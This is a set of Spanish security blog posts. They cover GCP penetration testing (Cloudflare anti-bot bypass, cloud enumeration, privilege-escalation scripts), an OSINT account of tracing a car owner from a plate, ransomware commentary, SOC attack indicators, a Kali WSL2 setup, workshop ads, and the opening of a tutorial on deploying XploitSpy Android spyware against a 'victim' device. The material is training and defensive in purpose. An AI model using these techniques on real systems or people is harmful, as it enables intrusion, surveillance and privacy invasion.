El código a continuación permite crear una sesión a algún sitio web evitando cualquier protección anti-bots (CloudFlare).

Imagen 3 - Script en Python para CloudScraper

Reconocimiento Activo: En el reconocimiento activo, el auditor interactúa con el objetivo para obtener información directamente de él. Este proceso se lleva a cabo principalmente a través de técnicas destinadas a identificar Buckets, Firebase Realtime Databases, Google App Engine sites, Cloud Functions, y Apps mediante fuerza bruta. Herramientas como cloud_enum o CloudBruteForce pueden ser usadas para este fin, El comando a continuación permite reconocer los servicios de GCP mediante el uso de la herramienta cloud_enum.

./cloud_enum.py -k [NOMBRE_COMPAÑÍA] -k [SITIO_WEB_COMPAÑÍA] -k [NOMBRE_ARCHIVO_RESULTADOS]

Escaneo y enumeración

Después de completar el Reconocimiento, se procederá a la etapa de Escaneo y Enumeración. Durante esta fase, el auditor interactuará con el objetivo, explorando y listando los diversos servicios de GCP. No se emplea el mismo enfoque para cada uno de ellos.

Si bien los escaneos se pueden realizar de manera manual; Herramientas como gcp_scanner, gcp_enum, GCP-IAM-Privilege-Escalation pueden realizar estos escaneos de manera automática.

El uso de una de estas herramientas como gcp_scanner permite identificar el nivel de acceso que posee alguna credencial de GCP.

python3 scanner.py -o [CARPETA_PARA_GUARDAR_RESULTADOS] -g –

Explotación

Una vez completado el escaneo y la enumeración, se avanzará hacia la etapa de explotación. Durante esta fase, se encargará de identificar posibles vulnerabilidades de seguridad basándose en los datos recopilados anteriormente.

Escalación de privilegios: GCP, al igual que otras plataformas en la nube, define diferentes entidades como usuarios, grupos y cuentas de servicio, para controlar el acceso a estos recursos, GCP utiliza un sistema de roles que permite otorgar permisos específicos a las entidades mencionadas. De esta manera, se define el nivel de acceso que una entidad tiene sobre un recurso determinado, es importante destacar que existen ciertos permisos que pueden permitir a un usuario obtener aún más permisos sobre un recurso o incluso sobre recursos de terceros. Esto se conoce como escalada de privilegios y puede ocurrir por la explotación de vulnerabilidades o por una configuración incorrecta de los permisos.

1) Escalación de Privilegios a Una Entidad: La escalada de privilegios a una entidad en GCP es un tipo de ataque que permite a un actor malicioso suplantar a otra entidad dentro del sistema. Esto significa que el atacante puede obtener todos los permisos y privilegios asociados a la entidad suplantada, permitiéndole realizar acciones no autorizadas en la infraestructura de GCP.

Un ejemplo de este tipo de ataque sería el abuso del permiso getAccessToken. Este permiso permite a un usuario obtener un token de acceso para una cuenta de servicio específica. Si un atacante puede obtener este token, puede utilizarlo para hacerse pasar por la cuenta de servicio y obtener acceso a los recursos que la cuenta tiene permiso para acceder.

2) Escalación de Privilegios a Un Recurso: La escalada de privilegios en un recurso en GCP es un tipo de ataque que permite a un actor malicioso obtener más permisos sobre un recurso específico del que originalmente tenía. Esto puede permitirle realizar acciones no autorizadas en el recurso, como modificar datos sensibles o incluso eliminar el recurso por completo.

Un ejemplo de este tipo de ataque sería el abuso del permiso setIamPolicy sobre Cloud Functions. Este permiso permite a un usuario modificar la política de IAM de una función, lo que le permite otorgarse a sí mismo permisos adicionales para ejecutar la función.

Para realizar este tipo de ataques se cuenta con Herramientas como gcp_privesc_scripts.

El código utilizado para llevar a cabo este tipo de ataques es podría ser un archivo de consola que la herramienta gcp_privesc_scripts provee con el cual únicamente con ejecutarse provee múltiples maneras de escalar privilegios sobre una cuenta.

sh main.sh

Imagen 4 - Opciones de gcp_privesc_scripts

@TheHackingDay

Encontré al responsable de chocar mi vehículo gracias al OSINT

2024-02-21T17:56:00.004-05:00

Hola. Me llamo Daniel, soy Geólogo y hasta que me sucedió la historia que les voy a contar en este artículo, no sabía que era el OSINT.

El día 17 de enero de 2023 en horas de la noche, mi vehículo fue estrellado por otro carro en el costado derecho; incluyendo puertas delantera y trasera, en el sector de Milán, de la ciudad de Manizales, Caldas, Colombia. En esta zona se dejan carros parqueados a un lado de la vía sin ningún inconveniente. Por razones desconocidas, el conductor que provocó el daño de dio a la fuga de manera inmediata, sin asumir ningún tipo de responsabilidad sobre el acto.

Algunos testigos del hecho anotaron la placa del vehículo causante y dejaron notas sobre el parabrisas y una ventana de mi vehículo (Mil gracias para ellos). Con los videos de la zona y las averiguaciones pertinentes en fuentes de tránsito no logré encontrar al propietario de este carro.

Teniendo solamente la placa del vehículo causante del daño, busqué la manera de saber quién era el propietario de este, para ello llevé a cabo las siguientes acciones:

Me dispuse a buscar los datos de contacto del propietario con la placa del vehículo causante a través de la plataforma del RUNT, pero no fue posible hacer la consulta ya que me requerían el tipo y el número de documento del propietario.
En vista de esto, decidí buscar una plataforma confiable que brindara información verídica sobre el propietario del carro, así encontré Autofact; me registré, hice un pago de aproximadamente $30,000 colombianos para el informe detallado relacionado a esa placa y esperé el informe en un plazo no mayor a 24 horas.

Una vez llegó el informe detallado, se obtiene información valiosa como: datos básicos del carro; clase, año, marca, modelo, color, número del chasis, tipo de combustible y autoridad ante la cual registra este vehículo. Otra información: historial de propietarios, situación del vehículo, SOAT, tipo de servicio automotor, medidas cautelares, accidentalidad, historial de solicitudes, entre otros. Pero en ningún momento se registra un número telefónico o un correo electrónico, tan solo nombre y CC del propietario actual.
Contando con el nombre, número de documento y tipo de documento se hace la búsqueda a través de la red social Facebook de un perfil correspondiente a este nombre, dando como resultado tres personas homónimas. En la inspección de cada uno de estos perfiles se verifica principalmente ciudad de residencia actual, lo que descartó inmediatamente dos perfiles y dejó uno.
Se procedió entonces a redactar un mensaje a través de esta plataforma a este perfil, con todos los detalles del evento y datos obtenidos del informe, para no dejar duda alguna de lo sucedido, y se dejó el número de contacto y WhatsApp para una posible respuesta más ágil.
Pasados unos minutos se recibe un mensaje por WhatsApp relacionado a la hija del propietario, donde ella explica que ha sido la responsable del choque a mi vehículo y expresa que se va a hacer cargo de la situación. Llevando el proceso a un feliz término.

CONCLUSION

La historia descrita muestra un uso efectivo y responsable de las técnicas de OSINT (Open Source Intelligence) para resolver un problema personal significativo, evidenciando la importancia de estas habilidades en el contexto de la vida cotidiana. Este caso específico destaca varias lecciones y conclusiones clave sobre el uso de OSINT:

Acceso a Información Pública y Especializada : La búsqueda inicial a través del RUNT (Registro Único Nacional de Tránsito) y posteriormente el uso de Autofact demuestra cómo plataformas específicas pueden brindar datos críticos cuando los canales tradicionales fallan o tienen limitaciones. Esto resalta la importancia de conocer y tener acceso a diversas fuentes de información que pueden variar según la naturaleza del problema.
Capacidad de Análisis y Deducción: La habilidad para analizar la información obtenida y tomar decisiones basadas en ella, como descartar perfiles no relevantes en redes sociales mediante la verificación de la ciudad de residencia, es crucial. Esto muestra que la recolección de datos es solo una parte del proceso de OSINT; la interpretación de estos datos es igualmente importante.
Uso Ético de la Información: El relato evidencia un uso ético y responsable de la información obtenida. En lugar de acciones potencialmente invasivas o confrontativas, se optó por un acercamiento respetuoso y comunicativo a través de redes sociales, lo cual finalmente llevó a una resolución positiva del conflicto.
Importancia de la Persistencia y Creatividad: Frente a obstáculos iniciales, como la imposibilidad de obtener información directa del RUNT, la persistencia en buscar alternativas viables y legítimas para obtener la información necesaria es fundamental. Este caso demuestra que, con creatividad y determinación, es posible superar barreras iniciales en la búsqueda de información.
Impacto Social de OSINT: La historia resalta el impacto que las técnicas de OSINT pueden tener en la resolución de problemas personales y sociales, proporcionando los medios para hacer justicia y resolver conflictos de manera pacífica y efectiva. Es un testimonio del poder de la información accesible públicamente cuando se utiliza de manera adecuada.
Educación en OSINT: Subraya la necesidad de una mayor conciencia y educación sobre las herramientas y técnicas de OSINT disponibles para el público general. Con el conocimiento adecuado, individuos pueden manejar situaciones adversas de manera más efectiva, utilizando los recursos informativos a su disposición, sin importar profesiones o grados de escolaridad.

Este caso es un ejemplo concreto de cómo las técnicas de OSINT pueden ser aplicadas de manera efectiva en situaciones cotidianas, demostrando su valor más allá de los contextos tradicionales de seguridad y defensa, hacia aplicaciones prácticas en la vida de las personas.

@jcaitf

Ciberataque IFX - Un Aviso y una Oportunidad de Mejora

2023-09-19T13:20:00.006-05:00

Hemos visto a través de diferentes medios el anuncio del Ciberataque del Malware de tipo Ransomware que ha sufrido la empresa IFX Networks que ha puesto en jaque a varias empresas públicas y privadas que tienen servicios con dicho proveedor.

Este articulo tiene como fin analizar un poco lo sucedido, ver las causas y consecuencias del ataque y sobre todo analizar las responsabilidades del mismo, entender un poco las opiniones certeras y erróneas sobre el tema y sobre todo, darle al lector un panorama de cómo debemos estar preparados hoy en día para este tipo de situación

Antecedentes

El día 12 de septiembre a las 05:50 de la mañana (hora de Colombia) la multinacional estadounidense IFX Networks que presta los servicios como proveedor de servicios de internet en 17 países de la región, evidenció que fue victima de un ciberataque de tipo ransomware que afectó su nube y secuestró la información de varias de sus máquinas virtuales.

Este ataque fue atribuido por el colectivo Ransomhouse, quienes ya han realizado varios ataques a otras entidades como Keralty y Sanitas. Si bien en el mensaje de rescate los atacantes dicen haber filtrado (Ver Imagen1) datos críticos de los clientes de IFX, la multinacional a la fecha del ataque desmentía y aseguraba que “no ha evidenciado vulnerabilidades en la información, privacidad y seguridad de los datos alojados en la nube”(Ver Imagen2).

Impacto

Hasta la fecha en que se escribió este artículo, se conoce la cifra de 762 compañías afectadas en el territorio en donde IFX presta sus servicios, siendo Chile, Colombia y Panamá los países más afectados.

En el caso de Colombia, se habla de más de 50 compañías afectadas, siendo muchas de estas entidades estatales. Entre las entidades afectadas por este ciberataque se encuentran: El ministerio de salud, la superintendencia de salud, la superintendencia de industria y comercio, la rama judicial, el ministerio de cultura, la biblioteca nacional, el museo nacional, el centro nacional de memoria histórica, entre otras.

Muchas Empresas públicas y privadas se han pronunciado al respecto y han desvelado de alguna forma la manera en que este ataque les ha afectado, comparto algunos de los comunicados que han salido:

Comunicados Oficiales del CSIRT de Chile:

https://csirt.gob.cl/noticias/10cnd23-00108-01/

https://csirt.gob.cl/noticias/10cnd23-00108-02/

https://csirt.gob.cl/noticias/10cnd23-00108-03/

https://csirt.gob.cl/noticias/10cnd23-00108-04/

Comunicados de CSIRT de Colombia:

https://colcert.gov.co/800/articles-278842_Documento_1.pdf

https://colcert.gov.co/800/articles-278865_Documento_1.pdf

https://colcert.gov.co/800/articles-278867_Documento_1.pdf

https://colcert.gov.co/800/articles-278875_Documento_1.pdf

https://colcert.gov.co/800/articles-278915_Documento_1.pdf

https://colcert.gov.co/800/articles-280570_Documento_1.pdf

https://colcert.gov.co/800/articles-280622_Documento_1.pdf

https://colcert.gov.co/800/articles-280648_Documento_1.pdf

https://colcert.gov.co/800/articles-280675_Documento_1.pdf

Rama Judicial de Colombia

https://escuelajudicial.ramajudicial.gov.co/sites/default/files/PCSJA23-12089.pdf

https://contingenciaportal.z13.web.core.windows.net/PCSJA23-12089C2.pdf

Comunicados de IFX Networks

https://ifxnetworks.com/updates/

La Realidad

La noticia sin duda ha sembrado posiciones desde diferentes puntos de vista, pero también se ha desinformado, se ha aprovechado la noticia para vender, para que otras empresas digan que su ciberseguridad es mejor, se ha planteado posiciones falsas sobre el tema simplemente por lucir, ya se le está dando también un toque político y como si fuera poco se lanzan culpabilidades, cuando posiblemente la responsabilidad de las vulnerabilidades además del proveedor de servicios por no tener sus sistemas actualizados razón de la vulnerabilidad que los expuso, puede recaer en las propias empresas afectadas.

Esta desinformación ha sido enorme sobre el tema y se ha confirmado a través de los diferentes comunicados que van en aumento las empresas afectadas, algo que desde la lógica es cierto al ver que la cobertura de la empresa IFX, no solo está en Colombia, Chile y Panamá.

Por otro lado, el grupo que demostró el ataque dejando evidencia en algunos servidores, a la fecha no ha expuesto ninguna información:

Que estarán Esperando????

Conclusión

Antes de concluir sobre lo sucedido quiero que se analice la siguiente imagen:

¨Existen dos tipos de empresas: las que han sido hackeadas y las que aún no saben que fueron hackeadas¨ John Chambers.

Y Justo a esto le agregaría otra más:

"Existen también aquellas empresas, que han pasado desapercibidas y no han sido objeto de ciberataques"

Creo que esta noticia la debemos tomar como una Oportunidad y un Plan de Acción a Seguir, lo sucedido a IFX solo se debe a la confianza y bajar la guardia cuando se pensaba que todo está marchando bien. Aunque se destaca que el equipo técnico de IFX no ha escatimado en esfuerzos para contener el ataque y poner en marcha nuevamente sus operaciones, es importante tomar acciones inmediatas.

Llego la hora:

De crear conciencia a los usuarios finales de un sistema.
Capacitar a nuestro personal técnico en temas de Ciberseguridad.
De someter a nuestros sistemas a procesos de Ethical Hacking, para conocer nuestras vulnerabilidades.
De crear un Plan de Continuidad de Negocio ante un Ciberataque.
De mejorar los procesos de Ciberseguridad Internos de las Empresas.
De endurecer nuestros sistemas.
De tener y aplicar una política de parches de Seguridad.
De tener los respaldos adecuados y probados.
De no ver la Ciberseguridad como un Gasto.

Y sobre todo llego la hora de cambiar nuestra mentalidad a la hora de proteger la Información de nuestra empresa, como menciona el Dr Heric Haseltine en su articulo "The Cyber Security Head Game": "Ganar guerras cibernéticas significa vencer la mente del adversario, no su tecnología."

@jcaitf

INDICADORES DE ATAQUE (IoA) Y ACTIVIDADES - SOC/SIEM - EXPLICACIÓN DETALLADA

2023-04-15T11:58:00.006-05:00

Qué es un Indicador de Ataque (IoA)

Los IoA son algunos eventos que podrían revelar un ataque activo antes de que los indicadores de compromiso se hagan visibles.

El uso de los IoA permite pasar de una limpieza/recuperación reactiva a un modo proactivo, en el que se interrumpe y bloquea a los atacantes antes de que consigan su objetivo, como el robo de datos, ransomware, exploit, etc.

Las IoA se centran en detectar la intención de lo que un atacante está tratando de lograr, independientemente del malware o exploit utilizado en un ataque. Al igual que las firmas AV, un enfoque de detección basado en IoC no puede detectar las crecientes amenazas de intrusiones sin malware y exploits de día cero. Por ello, las soluciones de seguridad de nueva generación están adoptando un enfoque basado en IoA.

Imagen Tomada de gbhackers

Diez indicadores de ataque (IoA)

Las siguientes actividades de ataque más comunes podrían haber sido utilizadas, individualmente o en combinación, para diagnosticar un ataque activo:

1) Equipos internos con destinos maliciosos

Los hosts internos que se comunican con destinos conocidos como maliciosos o con un país extranjero en el que no se realizan negocios.

Ejemplo de HP ArcSight Dashboard que muestra los host del cliente que se comunican con Feeds (IP, Dominio, URL) del sitio web "ransomwaretracker.abuse.ch".

Imagen Tomada de gbhackers

Ejemplo de inteligencia global sobre amenazas de McAfee.

Imagen Tomada de gbhackers

2) Equipos internos que se comunican por puertos no estándar

Equipos internos que se comunican con equipos externos utilizando puertos no estándar o con discrepancias de protocolo/puerto, como el envío de shells de comandos (SSH) en lugar de tráfico HTTP o HTTPS a través de los puertos 80 o 443, los puertos web por defecto.

Ejemplo de host interno que utiliza los puertos 21 (FTP), 445 (SMB), 137 (NETBIOS-NS) y 135 (RPC) para salir a Internet.

Imagen Tomada de gbhackers

3) Servidores públicos/DMZ que se comunican con hosts internos

Servidores públicos o hosts de zona desmilitarizada (DMZ) que se comunican con hosts internos. Esto permite saltar del exterior al interior y viceversa, permitiendo la exfiltración de datos y el acceso remoto a activos como RDP (Remote Desktop Protocol), Radmin, SSH.

Ejemplo de Informe que monitoriza el Top 10 de Tráfico desde la Zona "DMZ" a la Zona "Interna/Cliente".

Imagen Tomada de gbhackers

A partir de este informe, el analista de seguridad debe investigar los servidores destacados que se comunican con hosts internos a través de protocolos como RDP (TCP/3389) y SSH (TCP/22).

4) Detección de malware fuera de horario

Las alertas que se producen fuera del horario comercial estándar (por la noche o los fines de semana) podrían indicar un host comprometido.

Ejemplo de alertas IPS en tiempo no laborable.

Imagen Tomada de gbhackers

5) Escaneos de red realizados por hosts internos

Los escaneos de red por parte de hosts internos que se comunican con múltiples hosts en un corto espacio de tiempo podrían revelar que un atacante está moviéndose lateralmente dentro de la red.

Estos incidentes se detectan desde las defensas de red perimetrales, como cortafuegos e IPS.

Ejemplo de Informe de Exploraciones de Red que filtra de zona "Interna" a zona "Interna.

Imagen Tomada de gbhackers

6) Múltiples eventos de alarma de un único host

Múltiples eventos de alarma desde un único host o eventos duplicados a través de múltiples máquinas en la misma subred durante un periodo de 24 horas, como fallos de autenticación repetidos. ESTE ES UN CASO DE USO COMÚN.

Ejemplo de panel de control que supervisa los "fallos de inicio de sesión de usuario" de hosts individuales.

Imagen Tomada de gbhackers

Nota: algunos eventos de inicio de sesión fallido de aplicaciones de correo electrónico en teléfonos móviles pueden generar de más de 500 eventos por minuto. Es común que este caso suceda cuando la contraseña de una cuenta de usuario ha caducado, pero no se ha configurado la nueva contraseña en sus dispositivos.

7) El sistema se reinfecta con malware

Después de limpiar el host infectado, el sistema se reinfecta con malware en 5-10 minutos, las reinfecciones repetidas señalan la presencia de un rootkit o un compromiso persistente. Este incidente puede detectarse a partir de los eventos de la protección de seguridad Endpoint o antivirus.

Este es un ejemplo de panel de control de malware.

Imagen Tomada de gbhackers

Detección: Se deben crear al menos tres reglas en el SIEM como las siguientes:

· La regla alerta cuando se encuentra un host infectado y luego "Añadir a" la lista actual de hosts infectados y la lista histórica de hosts infectados (almacenar al menos 1 semana).

· La regla alerta cuando se limpia el malware del host infectado y se "elimina de” la lista actual de hosts infectados.

· La regla alerta cuando se encuentra un host infectado en la "Lista histórica de hosts infectados" dentro de un intervalo de tiempo específico. ¡QUE LOS SISTEMAS VUELVAN A ANALIZAR/INVESTIGAR EL MALWARE!

8) Inicio de sesión múltiple desde diferentes regiones

Una cuenta de usuario intenta iniciar sesión en múltiples recursos en pocos minutos desde o hacia diferentes regiones. Esto es una señal de que las credenciales del usuario han sido robadas o de que un usuario está tramando alguna travesura.

Ejemplo de regla correlacionada que Las soluciones ideales pueden variar en función de las condiciones de su red y de su política de seguridad.

Imagen Tomada de gbhackers

Esta regla detecta un evento en la categoría de normalización "login", con un resultado de evento igual a "exitoso" con múltiples geo-localizaciones de origen, dentro de un rango de tiempo especificado y los eventos son agrupados por usuario origen.

9) Los hosts internos utilizan mucho el protocolo SMTP

Los protocolos de correo electrónico como SMTP (Simple Mail Transfer Protocol), POP3 o IMAP4 debes ser monitoreados. Algunos malware utilizan estos puertos para enviar información a servidores maliciosos.

Ejemplo de cliente infectado que utiliza el protocolo SMTP (TCP/25).

Imagen Tomada de gbhackers

10) Los hosts internos realizan muchas consultas al DNS interno/externo

Muchas organizaciones tienen servidores DNS internos para cachear registros y ofrecer el servicio DNS a sus hosts internos. En la configuración DHCP se define como Servidor DNS Primario al Servidor DNS Interno. Si encuentra que algunos hosts internos realizan consultas a DNS externos como 8.8.8.8, 8.8.4.4 (Google DNS), debería realizar un escaneo de malware en esos clientes.

En algunos incidentes se detectó que el host interno consultaba muchas peticiones al servidor DNS interno (> 1.000 eventos/hora).

Imagen Tomada de gbhackers

Traducido de: gbhackers

@jmvargas19

@TheHackingDay

INSTALACIÓN DE KALI LINUX EN WINDOWS UTILIZANDO WSL2

2022-11-24T18:57:00.005-05:00

El Subsistema de Windows para Linux (WSL) permite ejecutar un entorno de GNU/Linux, incluida la mayoría de herramientas de línea de comandos, utilidades y aplicaciones, directamente en Windows, sin modificar y sin la sobrecarga de una máquina virtual tradicional o una configuración de arranque dual.

WSL2 es una nueva versión de la arquitectura del Subsistema de Windows para Linux que permite que el Subsistema ejecute archivos binarios de ELF64 de Linux en Windows. Sus principales objetivos son aumentar el rendimiento del sistema de archivos y agregar compatibilidad completa con las llamadas del sistema.

Esta nueva arquitectura cambia el modo en que estos archivos binarios de Linux interactúan con Windows y con el hardware del equipo, pero proporciona la misma experiencia de usuario que en WSL1.

A continuación, indicaremos los pasos a seguir para instalar Kali Linux tanto en Windows 10 como en Windows 11.

El primer paso es activar el WSL habilitando la característica opcional "Subsistema de Windows para Linux". Para esto se debe abrir PowerShell como administrador e ingresar el siguiente comando:

dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart

El Segundo paso consiste en habilitar la característica opcional “Plataforma de máquina virtual”. Para habilitarla se ingresa en PowerShell el comando:

dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart

Una vez realizado el paso anterior se debe reiniciar la máquina para que se apliquen los cambios.

El siguiente paso es descargar el paquete de actualización del kernel de Linux desde el enlace https://wslstorestorage.blob.core.windows.net/wslblob/wsl_update_x64.msi

Una vez descargado el paquete se ejecuta y se siguen los pasos de instalación

Ahora se debe establecer WSL2 como la versión predeterminada al instalar una nueva distribución de Linux, para ello se inicia PowerShell como administrador y se ingresa el comando: wsl --set-default-version 2

Lo siguiente es instalar Kali Linux. Si la instalación se está realizando en Windows 11, basta con ingresar en PowerShell el comando wsl --install -d kali-linux. Si la instalación es en Windows 10, se debe descargar la aplicación de Kali Linux desde la Microsoft Store o desde la URL https://aka.ms/wsl-kali-linux-new.

Al iniciar Kali Linux por primera vez se debe crear un usuario y una contraseña.

Se ha realizado una instalación básica de Kali Linux con solo una shell para trabajar, por lo cual es necesario actualizar e instalar las herramientas básicas que incluye Kali (La instalación de las herramientas es opcional y el proceso es demorado), para eso se deben ingresar los comandos sudo apt update && sudo apt full-upgrade -y y sudo apt install kali-linux-large -y

En caso de que Kali Linux se instale sin conexión a internet, con los siguientes comandos se puede solucionar ese error:

sudo rm /etc/resolv.conf

sudo bash -c 'echo "nameserver 8.8.8.8" > /etc/resolv.conf'

sudo bash -c 'echo "[network]" > /etc/wsl.conf'

sudo bash -c 'echo "generateResolvConf = false" >> /etc/wsl.conf'

sudo chattr +i /etc/resolv.conf

Ya se tiene Kali Linux instalado y funcionando, pero hace falta tener un entorno de escritorio, por lo tanto vamos a instalar el programa Win-KeX que proporciona la interfaz de escritorio de Kali Linux para WSL2.

La instalación de Win-KeX se realiza con el comando: sudo apt install kali-win-kex -y

Existen tres modos diferentes de ejecutar Win-KeX: modo ventana, modo de sesión mejorado y modo continuo.

El modo ventana ejecuta una sesión de escritorio de Kali Linux en una ventana separada, manteniendo visualmente separados los entornos de Windows y Kali.

Para ejecutar este modo se ingresa el comando kex --win o con solo kex ya que el modo ventana es el modo por defecto de Win-KeX.

La primer vez que se ejecuta Win-KeX en modo ventana se solicitará establecer una contraseña de servidor vnc.

Ahora ya contamos con el entorno de escritorio de Kali

Con la tecla F8 se accede al menú de opciones y al seleccionar la opción Disconnect se sale del modo grafico y se regresa a la Shell.

El modo de sesión mejorado ejecuta una sesión de escritorio de Kali Linux en una ventana separada utilizando protocolos y clientes nativos de Windows.

Para ejecutar este modo se ingresa el comando kex --esm

La primer vez que se ejecuta Win-KeX en modo ventana se solicitará establecer una contraseña de servidor rdp. Esta es la contraseña del usuario de Kali con el que se va a iniciar sesión.

En la primer conexión también saldrá un mensaje de advertencia que indica que el editor es desconocido, para que este mensaje no vuelva a salir se debe marcar la casilla “No volver a preguntarme”

Ahora se cuenta con acceso al entorno de escritorio de Kali por conexión rdp.

Para cerrar sesión en este modo, basta ir a las opciones de sesión y hacer clic en el botón “Log Out”.

El modo continuo abrirá un panel de Kali Linux en la parte superior de la pantalla del escritorio de Windows. Las aplicaciones iniciadas a través del panel compartirán el escritorio con las aplicaciones de Windows.

El modo continuo elimina la segregación visual entre las aplicaciones de Windows y Linux y ofrece una gran plataforma para ejecutar una prueba de penetración en Kali Linux y copiar los resultados directamente en una aplicación de Windows para el informe final.

Para ejecutar este modo se ingresa el comando kex --sl

Saludos

TALLERES POSTPANDEMIA

2022-06-21T15:18:00.011-05:00

Después de la Pandemia el proyecto The Hacking Day regresa con lo mejor de sus talleres y esta vez On Line, los cuales vamos a estar dictando entre los meses de julio y diciembre del presente año.

Además de nuestros ya reconocidos talleres, traemos un taller sorpresa que se va a realizar de manera presencial en Colombia en la ciudad de Pereira.

En esta entrada te vamos a contar más a profundidad tanto de los cursos en modalidad virtual como el presencial, el temario, las fechas en que se dictarán y algunas otras cosas. ¿Y qué hay de la certificación internacional THD-EPC Etical Pentester Certified? Continua leyendo este articulo para que conozcas en que fechas y sedes la dictaremos.

Como puedes observar en la anterior imagen, los cursos que vamos a realizar de manera on line son: Firewall Open-Source Empresarial, Descubriendo Ataques Mediante Análisis de Tráfico, Hardering En Servidores GNU/Linux - Nivel 1, Hardering En Servidores Windows, Ataques a Redes IPv4 / Ipv6, Nmap en Profundidad y Computo Forense - Generalidades. Ademas de que dictaremos de manera presencial el curso Pentesting con Wifi Pineapple en la ciudad de Pereira. A continuación vamos a profundizar un poco sobre de que trata cada uno de los cursos.

Firewall Open-Source Empresarial

En este taller se enseñará como realizar la Implementación de un Cortafuegos a nivel Empresarial, se creará y administrará diferentes zonas con sus respectivas reglas para el control correcto de los paquetes que pasan hacia la WAN, LAN, DMZ o zona de Invitados. Se configurará servicios especiales como VPN, Filtro de Contenidos, Canal Redundante, Control de Ancho de Banda, entre otros. Inscríbete aquí.

Descubriendo Ataques Mediante Análisis de Tráfico

En este taller se darán a conocer los tópicos básicos y herramientas que permitan identificar patrones de tráfico asociado a diversas actividades maliciosas que ponen en peligro la seguridad de las plataformas informáticas. La metodología del taller será teórico–práctica, lo que permitirá fortalecer los conceptos básicos, profundizar en el uso de las herramientas y en la interpretación de los patrones de tráficos asociados a los casos planteados. El componente práctico será desarrollado a través del uso de máquinas virtuales y capturas de tráfico preparadas, estas serán suministradas al momento de iniciar el taller. Inscríbete aquí.

Hardering En Servidores GNU/Linux - Nivel 1

En este taller se detallarán los pasos a seguir para la instalación, endurecimiento y aseguramiento del sistema operativo Linux enfocado a servidores, siguiendo las recomendaciones expuestas internacionalmente, este taller puede ser aplicado a sistemas basados en Debian (Ubuntu) y Redhat (Fedora, Centos). Inscríbete aquí.

Hardering En Servidores Windows

En este taller se detallarán los pasos a seguir para asegurar un sistema operativo Microsoft Windows, siguiendo las recomendaciones expuestas internacionalmente, este taller puede ser aplicado a sistemas Windows de la serie Server en sus últimas versiones. Inscríbete aquí.

Ataques a Redes IPv4 / Ipv6

En este taller se aprenderá a utilizar las técnicas más usadas por los ciberdelincuentes para realizar ataques de red, con el fin de contrarrestarlos. Ataques de Hombre en Medio (MITM), Ataques de Suplantación DNS, Ataques a protocolos de Cifrado SSL/TLS, Ataques de Denegación de Servicio, Ataques Proxy, entre otros hacen parte de lo explicado en este taller, todo ello enfocado a redes Ipv6 e Ipv4. Inscríbete aquí.

Nmap en Profundidad

En este taller se explicará el uso de NMAP (Network Mapper), el cual es un software de código abierto que se utiliza para escanear una red y sus puertos con el objetivo de obtener información importante sobre la misma para controlar y gestionar su seguridad. Es una aplicación que se utiliza normalmente para realizar auditorías de seguridad y monitoreo de redes. Inscríbete aquí.

Computo Forense - Generalidades

Este curso te permitirá entre otras:Asegurar la integridad y disponibilidad de la infraestructura de red cuando sucede un incidente de ciberseguridad o ataque informático, Identificar y obtener evidencias de los cibercrímenes de manera apropiada, Asegurar la protección adecuada de los datos y el cumplimiento regulatorio, Proteger a las organizaciones para que no vuelvan a suceder en el futuro los incidentes ocurridos, Ayudar en la protección de crímenes online, como abusos, bullying…, Minimizar las pérdidas tangibles o intangibles de las organizaciones o individuos relativas a incidentes de seguridad y Soportar el proceso judicial de enjuiciamiento de los criminales. Inscríbete aquí.

Pentesting con Wifi Pineapple - Taller Presencial

En este curso presencial que realizaremos en Colombia en la ciudad de Pereira, profundizaremos en el uso del dispositivo Wifi - Pineapple, el cual puede usarse para un montón de cosas, muchas de ellas dirigidas a la auditoria, se pueden instalar módulos como tcpdump, DNSspoof, sslstrip, reaver, Portales maliciosos, etc, etc. Además, es tan ligero que se puede llevar fácilmente y alimentar con una batería. O simplemente puedes llevarlo contigo para crear una red AP con la que compartir tu conexión a Internet.

En el curso no solo veremos la manipulación del dispositivo, sino que también aprenderemos a realizar ataques básicos como son: Darma, DeAuth, Wps, Ethercap, UrlSnarf, Entro otros y ataques avanzados como: Portal Cautivo, Dns Spoofing, Jammer, Entre Otros. Además, se realizará una salida de campo en la que llevaremos a la práctica los ataques vistos en clase.

Nota: Recuerda que este es un taller especial, por lo cual existen varios temas que debes tener en cuenta: La cantidad de cupos para el taller está limitada a 20 personas; como el curso incluye el dispositivo Wifi Pineapple Mark VII, tienes plazo para realizar tu preinscripción hasta el día 30 de septiembre, una vez realices la preinscripción recibirás un correo con los pasos a seguir, debes pagar el dinero de la reserva antes del día 10 de octubre, esto con el fin de asegurar el costo del dispositivo ¡Pero no te preocupes! si por alguna razón no puedes asistir al curso y ya pagaste, se te hará entrega del Pineapple y se te hará la devolución de US $30; no olvides que este es el único taller de la Pineapple que realizaremos este año. Inscríbete aquí.

¿Y qué pasa con la certificación THD-EPC Etical Pentester Certified?

En cuanto a nuestra reconocida certificación internacional THD-EPC Etical Pentester Certified ya tenemos programadas una fecha para Bolivia.

Se llevará a cabo entre los días 15 y 28 de agosto en la ciudad de Santa Cruz de la Sierra, en las instalaciones del CITT de la UAGRM

Para Colombia y Ecuador aún no tenemos una fecha definida, así que recuerda estar pendiente de nuestras redes sociales y nuestro blog, ya que apenas tengamos la fecha la publicaremos por esos medios.

Esperamos verte pronto en alguna o algunas de nuestras capacitaciones.

@jmvargas19

@TheHackingDay

USANDO LA HERRAMIENTA XPLOITSPY

2022-05-11T14:12:00.002-05:00

Xploitspy es una herramienta con características interesantes para el monitoreo de dispositivos con sistema operativo Android.

Algunas características son:

Ver contactos
Enviar mensajes
Registros de llamadas
Explorador de archivos
Administración del dispositivo
Registros del GPS
ver aplicaciones instaladas

Entre otras características que puedes consultar en el repositorio del proyecto.

El objetivo de este artículo será montar un pequeño demo en la nube de esta herramienta. el cual funcionará como el servidor al cual se conecte nuestro dispositivo Android “víctima”.

Dado que Xploitspy está desarrollado con Node.js y que depende mucho de las preferencias particulares que tengas al momento de desplegar infraestructura, no explicare esta parte, sin embargo para este articulo estaré usando Heroku. También usaré un dispositivo Android con Termux como terminal de trabajo para variar un poco, pero tú puedes usar Kali o la distribución que prefieras usar. Dicho lo anterior, empecemos…

Aviso: Heroku suspenderá tu cuenta si realizas este proceso

Lo primero es tener una cuenta en Heroku, luego crearemos una aplicación

En nuestro dispositivo de trabajo ingresamos a la terminal

Recuerda que si es la primera vez que estas usando Termux en tu dispositivo Android como terminal para realizar tareas de seguridad como estas, actualiza los repositorios con el comando apt update && apt upgrade
